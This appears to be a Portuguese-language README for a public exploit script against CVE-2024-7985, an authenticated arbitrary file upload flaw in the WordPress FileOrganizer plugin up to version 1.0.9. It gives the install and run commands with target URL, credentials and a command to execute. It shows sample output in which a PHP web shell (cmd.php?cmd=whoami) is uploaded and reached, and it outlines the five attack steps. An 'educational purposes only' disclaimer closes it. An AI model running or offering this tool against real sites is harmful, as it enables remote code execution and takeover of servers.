
FileOrganizer <= 1.0.9 - Autenticado (Assinante+) Upload Arbitrário de Arquivo
FileOrganizer <= 1.0.9 - Upload Arbitrário de Arquivos Autenticado (Subscriber+)
CVE-2024-7985 - O Plugin FileOrganizer <= 1.0.9 do WordPress é vulnerável a uploads arbitrários de arquivos autenticados, permitindo que atacantes com privilégios de Subscriber+ carreguem e executem arquivos maliciosos remotamente. Essa vulnerabilidade decorre da ausência de validação do tipo de arquivo na função fileorganizer_ajax_handler, tornando possível a Execução Remota de Código (RCE).
🚨 Este exploit permite que atacantes executem comandos arbitrários no servidor! 🚨
requestsbeautifulsoup4Instale as dependências:
pip install requests beautifulsoup4
python CVE-2024-7985.py --url "http://target-site.com/wordpress" --username "admin" --password "admin" --cmd "whoami"
usage: CVE-2024-7985.py [-h] --url URL --username USERNAME --password PASSWORD [--cmd CMD]
FileOrganizer <= 1.0.9 - Authenticated (Subscriber+) Arbitrary File Upload by | Nxploit Khaled_alenazi
options:
-h, --help show this help message and exit
--url URL Target WordPress site URL
--username USERNAME WordPress Username
--password PASSWORD WordPress Password
--cmd CMD Command to execute in uploaded file
[+] Vulnerable version detected: 1.0.9
[+] Logged in successfully!
[+] Extracted nonce: 7b4a95872b
[+] File uploaded successfully!
[+] Access file at: http://target-site.com/wordpress/wp-content/uploads/fileorganizer/cmd.php?cmd=whoami
1️⃣ Verificação de Versão - Determina se o site é vulnerável.
2️⃣ Autenticação - Faz login no WordPress.
3️⃣ Extração de Nonce - Recupera o token de segurança.
4️⃣ Upload de Arquivo - Envia um script PHP malicioso.
5️⃣ Execução de Comandos - Executa comandos especificados pelo usuário.
Este script é apenas para fins educacionais; o autor não se responsabiliza por qualquer uso indevido ou consequências. 🚨